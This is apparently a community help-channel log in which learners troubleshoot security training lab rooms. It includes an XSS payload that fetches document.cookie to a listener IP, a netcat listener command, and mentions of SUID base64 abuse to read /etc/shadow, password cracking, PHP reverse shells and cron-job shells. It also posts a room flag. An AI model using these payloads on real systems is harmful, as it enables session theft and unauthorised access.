@left thunder Thanks... OK, I am going to do this 3 more times then I am giving up on this room and moving on. Once I got my ticket cookie because I didn't know any better. Now for the past 2 times I have not gotten any cookie including my ticket cookie. I copied and pasted the payload from the room replacing {URL_OR_IP} with my local machine's IP (I am using the VPN) and in a terminal window i have nc -nlvp 9001 listening on any 9001. Wish me luck!
Gave +1 Rep to @left thunder
@left thunder i meant my local machine's IP:9001
I mean, if you are using the same payload and you are not even receiving your own session cookie, there might be something wrong with the payload
Could you copy paste it so that I can see?
@left thunder Hold on as it will take me a few minutes to transfer from my Kali to Windows here.
@left thunder </textarea><script>fetch('http://192.168.1.76:9001?cookie=' + btoa(document.cookie) );</script>
Is that the IP you are using ?
yes that's the IP of my Kali Machine where all of this is running
Well you have to use your tun0 IP, the target machine can't reach you with that IP
Is the VPN running directly inside your kali VM or on your windows host?
VPN on Kali VM
Okay, then check ip a s and use your tun0 IP
Also make sure there is only a tun0 interface and not any extra like tun1, tun2 etc.
yup.. if config shows just tun0 not tun1, etc
ok!!!! let me try THAT!
curious what does ip a s show?
Enter it and you'll see. ifconfig is deprecated
ahhhh thanks!
its colorful too!
ok... waiting a minute or two... the suspense builds
You might have to restart the target machine again, since you used some bad payloads with a wrong IP, but maybe it still works, this machine is a bit finicky
ok but it makes sense to use the tun0 address
Certainly, yes
duhh
got a message in the VPN window... HMAC authentication failed
i think I am just going to move on... I've wasted too much time in this room... and I have learned a little bit about networking
thanks for your help though!!
Up to you, not a problem
@left thunder BTW. I finally completed the room using Attack Box and your suggestions. VPN kept giving me HMAC Authorization Errors. I left some constructive suggestions on how to improve the room.
ever figure this out?
Hey, I know that the problem from Lemur already been solved. But I just realize that if I only put one line at the end of the header request the flag won't appear.. instead we should add 2 lines.. maybe you can add it to the room hint.. thanks
Gave +1 Rep to @left thunder
I'm not the room creator nor am I able to edit anything, but I would say that is nothing to add as a room hint. For once because the room is showing you to add the extra header in the header tab instead of the request tab itself. And secondly, if there are 2 empty lines in the original request but you are altering the request so that there is only 1 empty line left, that's not an issue of the room.
Hi
Hi
I can't seem to find the password, to deploy the machine for the vulnversity room.
Can someone please help out?
There is no password to deploy the machine, you just have to press the green "start machine" button in task 1
Thanks. I assumed we had to ssh tryhackme@ and then start off
anybody had the problem where you start a machine and it runs, but mozilla is not connecting to any website?
Are you using the attackbox?
We might need some more information to help.
- Which room?
- Are you using the attackbox
- Are you a subscriber?
Nop, I had to go to another room
Hi there,
How do I login to attacktive backup username
I have tried the following combo in RDP and it is not working for me:
ATTACKTIVEDRECackup
SPOOKYSECackup
.backup
backup2517860
hey, I transferred the executable which is present in this room https://tryhackme.com/room/brainstorm to the machine which is available in this room https://tryhackme.com/room/bufferoverflowprep and still, I am getting this error (also it is not running properly in the immunity debugger)
I'm not sure why you want to do that, but it seems the executable in Brainstorm room depends on the essfunc.dll file as well so you should transfer both .exe and .dll I guess.
Make sure you download it in binary mode from FTP
Tryhackme/room/contentdiscovery , task 3 (manual discovery -favicon) I am trying to download favicon using (curl (site url) | md5sum. But nothing is downloading it keep running stats with time
Is that what you see?
Yes But hash is different
What is the syntax you enter?
curl https://static-labs.tryhackme.cloud/sites/favicon.ico | md5sum
Your URL is wrong.
You need to add a " images/ " between /sites/favicon.
So it becomes.
No worries! Happy Hacking!
Yeah?
My machine has a 10.10.9.141 IP machine that is active. But when I click on the link to access website (Acme IT Support website) It failed to load.
I tried with https and http both. But the site is inaccessible.
Are you still on Content Discovery?
You're a free user on the Attackbox?
Yes
You won't be able to do it as you won't have an internet connection.
If possible, I suggest you use a VM.
I also have kali linux in vmware workstation
Use that.
you just need to download the VPN script.
But how it can resolve it
you can't on the attackbox unless you're a sub.
You need to run it with
sudo path/to/file
https://tryhackme.com/room/openvpn here is a guide for how to use the vpn file and how to download it
sudo openvpn /path/to/file.ovpn
So, repeating what I just said, lol.
no you missed the openvpn part of the command
$ sudo ./shadowabsorber.ovpn
[sudo] password for sam_tunder:
sudo: ./shadowabsorber.ovpn: command not found
Tue Apr 5 16:54:49 2022 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Mar 22 2022
Tue Apr 5 16:54:49 2022 library versions: OpenSSL 1.1.1f 31 Mar 2020, LZO 2.10
Tue Apr 5 16:54:49 2022 Outgoing Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
Tue Apr 5 16:54:49 2022 Incoming Control Channel Authentication: Using 512 bit message hash 'SHA512' for HMAC authentication
very different
Command worked using (sudo openvpn /filename)
yeah the .ovpn file extension yes... but not the openvpn part of the command
Either way, they still got it.
true
Still rude.
It's just loading. Is it okay?
hopefully the room shadow linked will help a lot too
sorry then @lucid junco
when you see that it worked, you now need to leave it like that, just minimize the window.
I wasn't being serious Shadow.
and to close the connection when you are done use ctrl + C
But you will need to open it every time you want to connect to the THM machines.
But it's not done yet.
And Says TLS handshake failed
Process restarting
I have a firewall configured in my network.
Process restarting due to firewall?
It stuck at UDP link remote: [AF_INET]3.7.33.194:1194
yeah the firewall could be a problem
No, is it your computer?
You could speak to your ICT team, ask them if they can open up port 443 ( I think it's that one) so you can use OpenVPN.
If they say no, there is nothing we can do.
I am sure they are not gonna allow me here . So simply i can use my phone carrier internet using hotspot. It may work.
That could work, yes
Everything is working well now. Thank you for your support and helping me to figure it out.
no problem... enjoy your learning potential
Once again thanks to both of you guys Scrubz and Shadow.
So I am losing my mind with Burp Suite
Whenever I use 'http://machine_ip/" I get this:
I can't upload the image but it says "ERROR: unknown host'
No matter whether I use the AttackBox, Kali or WIndows.
Are you still having this problem?
Yep
Have you started the machine in task 1?
In the gatekeeper room, the gatekeeper.exe doesn't appear to be vulnerable to buffer overflow. Is it exploitable but I'm just messing it up?
Hi
I need some help with the startup room
Basically some spoilers ||theres a web on http that says its being built with ftp and ssh open, and i've found an address with /files/ and it has a meme .png file in it in which i looked at with steganography but nothing found, and a notice with a user called maya in which i am trying to find if this user is registered in the ftp or ssh server||
|| But, while trying to log in of course ftp nor ssh tells me if the user is registered so i cant really try to brute force it and now i'm stuck at this stage||
||Theres a hint that says "FTP and HTTP. What could possibly go wrong?"||
What is the room URL?
||Well, Apparently, You can log into FTP as anonymous so that was my goof, looking through some more stuff now||
||Never mind, The /files/ address on the website replicates the ftp server and theres an ftp directory which wont let me in both website and terminal||
Wheres the location for php reverse shells in kali linux? Or will I have to find some on github
Nvm got one from pentestmonkey
ah thank you
||I've done it! With a php reverse shell and now its time to priv esc||
I'm having a hard time understanding what's going on, here. I guess there's a firewall...
it says the scripts were ran but no info returned
this is in the Kenobi room
Late reply - but as I am revisiting Snort. Take a look at Snort.org and their description of what it is.
"..or it can be used as a full-blown network intrusion prevention system."
which room is this for? if the VM is windows, you may not be giving it enough time to come up
the scan runs, returns nothing. This is the Kenobi room under the Offensive Pentesting module
i'm not sure why the scripts aren't working correctly
idk why I have so much trouble with nmap, lol
are you on attackbox, or your kali vm?
are you on the VPN?
yes. I'm connected
Bro may I know any good alt for nessus
i'm confused to what the problem is. I've never had a script not return anything
hi everyone
im trying to use bloodhound to help enumerate the network
when importing the loot.zip file - keep getting a BAD JSON FILE error
would love some help on how to fix this
#infosec-general unless this question is specific to a THM room
You can ping 10.10.10.10? and curl 10.10.10.10/whoami shows your tun0 ip address?
OK
can you show me a screenshot of ip a @white salmon ?
idk why it has multiple tunnels. Probably because I had to reconnect a few times
and curl 10.10.10.10/whoami
that actually is likely the problem
you have multiple VPN connections open
ps aux | grep openvpn
no response for curl/whoami
and the ps command please
that worked perfectly! thank you
Gave +1 Rep to @umbral umbra
Im trying to get the SEQ number of packet 62 (Snort challenges 1 room, Task 2 Question 4) and i think im using the -n tag correctly as I answered the previous questions using it. But it is just not taking my answer now
'-n 62' seems like it should work.. i mean the sequence numbers seem to all be the same anyway. I dont understand how i can be getting it so wrong.
Ah maybe i was checking the alert files as opposed to the log file..
Nope. Still no luck. Sorry for spam everyone..
I figured it out lol
Metasploit exploitation Meterpreter -- I cannot get meterpreter prompt from the attackbox, any ideas?
Probably best to verify in order to be able to send screenshots
Then send a screenshot of your module options
!docs verify
Hey, any hints (privesc) in this room https://tryhackme.com/room/gatekeeper
look into decrypting firefox browser creds :)
Hi all, im working my way though the https://tryhackme.com/room/ccpentesting room and I'm a bit stuck on the SQL injection section, I've found the db name, and I can print the tables, but instead of having fields and values, they are just blank. Here is my input to the console sqlmap -u http://10.10.220.250 --forms -D tests --dump
It works but is there any command like sudo in windows
Working on the https://tryhackme.com/room/linprivesc room and I'm stuck on the SUID privilege escalation section. I believe I found the vulnerable ****64 binary with the "s" bit set, but I'm unsure as to how I can abuse it to maintain root privileges.
The runas command is also not working
No worries I got it :)
I am particularly confused on what should be stored in the LFILE variable shown in the GTFObin example
look into psexec
thank you for the suggestions I complete the room :))
Gave +1 Rep to @cedar anvil
Nevermind, I figured out what I had to do
that binary lets you ||read arbitrary files|| which gives you access to root account
on my way to figuring out that password with|| john||!
Still working on the https://tryhackme.com/room/linprivesc room and stuck on the SUID section. I abused the vulnerable binary to read the /etc/shadow and /etc/passwd files, unshadow them, and cracked the passwords for user2 and gerryconway users. While I was able to answer the 2nd question in this section, I'm still confused on how I'll be able to get read-access for flag3.txt.
Was there another vulnerable binary that I missed? I tried using the same ****64 binary to read the file, but I was still denied access. I could use a nudge in the right direction.
what was the command you tried to use to read flag3.txt???
LFILE=/home/ubuntu/flag3.txt
./base64 "$LFILE" | base64 --decode
Result: ./base64: /home/ubuntu/flag3.txt: Permission denied
Perhaps the full path is causing an issue?
what user are you running the command as???
user2
hmmmm
going to launch the machine and test it themselves to see
in the mean time a good idea might be for you to verify your discord so you can share screenshots
!docs verify
try ||base64 /home/ubuntu/flag3.txt | base64 --decode|| if that does not work try restarting the target machine and try again... or run the command as the user it starts you out as
shadow thinks you made it not work because of the ./ before the command
Perfect! I had no idea that was the issue. Thanks for helping me troubleshoot
Gave +1 Rep to @alpine kestrel
no problem
Hi. I think there is a mistake in Task 7 of room: windows internals. I executed the .exe file and wrote the flag but it is said that it is not right.
Please help!!
Working on https://tryhackme.com/room/linprivesc and I'm stuck on the Cron Jobs section. I've modified the existing backup.sh file and created the previously deleted /tmp/test.py file and haven't received a shell yet.
Is it something with my syntax? Or do I need to use Python through Bash in backup.sh?
Check the permissions of your backup.sh file
That's embarrassing. Got the reverse shell just now after changing it. Thank you for the nudge!
Gave +1 Rep to @left thunder
Happens
have made that mistake too many times
This is just a general question. Is it possible to add a user to the /etc/passwd file with echo?
Every time I attempt this, it spits out this weird KYkKmueqNX/ string as if my command was edited as it was executed. Then I look in the /etc/passwd file and the password I tried to enter is replaced by a single /.
I understand that this isn't required for the particular section I'm in, but I remember it being discussed in a previous one and I wanted to try it out.
I'm trying to do this in https://tryhackme.com/room/linprivesc on the Cron Jobs machine.
I also escalated to root before trying this so it shouldn't be an issue of privilege
Starting doing some research on the difference between /passwd and /shadow
I understand that shadow is for the encrypted passwords, and passwd is for user account information. I saw in the SUID section that they were able to only edit the /passwd file and successfully add a user. Or was there a step that wasn't shown which involved editing the /shadow file?
Or maybe echo caused some sort of issue? Idk, I'll have to do more research into /passwd and /shadow like you said
@grave dagger i was curious about that too, didn't try that method, but remember that snippet in the instructions ... from your other screenshot, looks like no escape or quoted characters in that string, with the special chars in the hash, bash (or sh ) will interpret a lot as something it's trying to process... you could write just that line to a file by itself, then cat my-new-user >> /etc/passwd ... otherwise you'll need quotes, backslashes, etc to escape all the special chars in the hash I think
Someone on ollie?
There would be a dedicated channel for it in case you didn't see it #962049333614768178
Ye, I think just escaping the $ chars should be fine @grave dagger
Ohhh I didn't think to write it to a file first and then piping it. That's smart! So basically if I want to write it directly to the file I need to use escape characters
I always forget about special characters
Hi. I think there is a mistake in Task 7 of room: windows internals. I executed the .exe file and wrote the flag but it is said that it is not right.
Please help!!
You don't need to multi post in different channels to get an answer.
However I've just done it, there is a very strong chance you're entering the wrong thing.
that is the flag I am entering: THM{1Nj3c7_4IL_7H3_7h1NG2}
I've helped you in #room-help (This is an example of keeping to one channel) Sorry for minimodding
-I am trying to do the Burp Suite room and I am in the Sequencer portion of the room. When I send a GET request that generates a cookie from my web browser to the sequencer; it doesn't create any tokens.
-I put this same request in the repeater to see what would happen and the response doesn't set a cookie, it gives me a "400 Bad Request" status.
Why is the response status changing from a "200 OK" in the HTTP History tab to a "400" in the repeater/sequencer?
hello - can anyone help me with room Splunk2g where it's asking for Amber Turing's personal e-mail address?
like is it somewhere in the 4 events you get from this search query:index="botsv2" sourcetype="stream:smtp" aturing@froth.ly berkbeer
oh snap...never mind, I actually found it
ok now I'm stuck on this question:
What SQL function is being abused on the URI path from the previous question?
can i get some help on wonderland
how do i exploit walrus_and_the_carpenter.py
I tried library hijacking but random.py is not writable
and cant change the priority
Is this an issue of climate change, @burnt rivet ?
I tried harder
what you stuck on?
trying to get a metasploit shell on a pivoted windows pc (PCFILESRV01)
Hey, im doing the Cyborg CTF, and im stuck on not knowing what to do. I have just a bunch of encrypted things however no clue what to do with them as 1 is sha256. others seem to be MySQL323 or LM. But no Database. Im basically lost. I've found multiple things such as the directory to /squid/passwd and /squid/squid.conf. Not only that I have the final archive with a bunch of files that just completely confuse me such as the config text file. ID? and Key?(The ID is a hashed SHA256 but what is the key?) Am I going in the right direction? I have no idea what to do next
I just don't understand these files
hey all. wondering if anyone can point me in the right direction...
currently in Attacktive Directory.
in task 5, abusing Kerberos,
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
I haven't got a clue which one I am supposed to do?
how do i select a process
Locate the process that is running on the deployed instance (10.10.214.66). What flag is given?
i found the tryhack+ process running
but how do i see the flag?
on linux: ps aux
on windows: powershell -c Get-Process
well see the first about 10-15 chars and use find on this page with ctrl + f on the hashcat examples page
i.e ||https://hashcat.net/wiki/doku.php?id=example_hashes|| is the link if you need it @exotic geyser
yeah but how do i see the flag
well if it fills your screen to much and you need to be able to scroll it slowly pipe it into less and then read it line by line
What flag is given
are you looking for the program flags, or a THM{SUFDISIFDSOFSADOJIFJOSDF} flag?
sometimes the hard way is easy
there is a very important difference.
thanks I got the link before. but i am not sure what i am searching for apart from kerberos?
Gave +1 Rep to @alpine kestrel
THM{} flag
this is what you're looking for
thats what i got but i doesn't work in the answer π’
give the page a refresh
searching for ||$krb5asrep$23$|| will send you to a number on that page which is the correct answer
now how was i meant to know that
Unless the machine is broken (possible, but unlikely), you're missing it,
uum that is not for you dfae that was for batch
where is it meant to be
in the ps aux output.
it isnt
okay this is it, but I am not sure where I had found that on kerbrute or enum4linux?
it dumps a huge line of a hash when you make it give you the password hashes.... the start of one of those hashes has the spoilered string and then you search for it on the hashcat page
how am i meant to know which process it is
the question could be a bit more helpful.
it is obvious based on its name being THM{blahblah} something
I just deployed the machine; the process is very obvious.
I think I have missed something here. I've not seen any hashes, I will go back and go through it again. Thanks
Gave +1 Rep to @alpine kestrel
when you copy the name make sure to not have spaces before or after the flag when pasting it as that will make it not work
no problem hope you get it working and find what you missed
good job
Can you help me with ollie box?
#962049333614768178 could be a better place to ask for help for that room.
hi can somebody help me with nmap in vulnversity
im using nmap -sV 10.10.108.73
but im getting more open ports and no squid proxy
ya, i got all that i needed for the q's with that..
So I am stuck on the Authentication Bypass room
How do I save the results_
*?
I did the ffuf command, got no errors and that's it.
-o in ffuf iirc
I'll try it out. Thanks!
Right click on the speech bubble.
thank you
This is Windows Fundamentals 1?
yeah even though i believe I have enough knowledge about windows I still want to complete it so I can complete pre security path
It's a good idea, after all, you just learnt something new there.
I just checked and the answers still stand correct.
Yes, they are still the same.
Yes.
i cant get it so what is the problem ?
i just get 3 ports in shodan and the third one is 9090
check that you don't have a typo, because I just tried as well and the answers are the same in the room and shodan
The third one for me is not 9090, and it's the right answer.
9090 for me isn't even in the top 10.
i answered 9090 but it say its wrong
Because it is...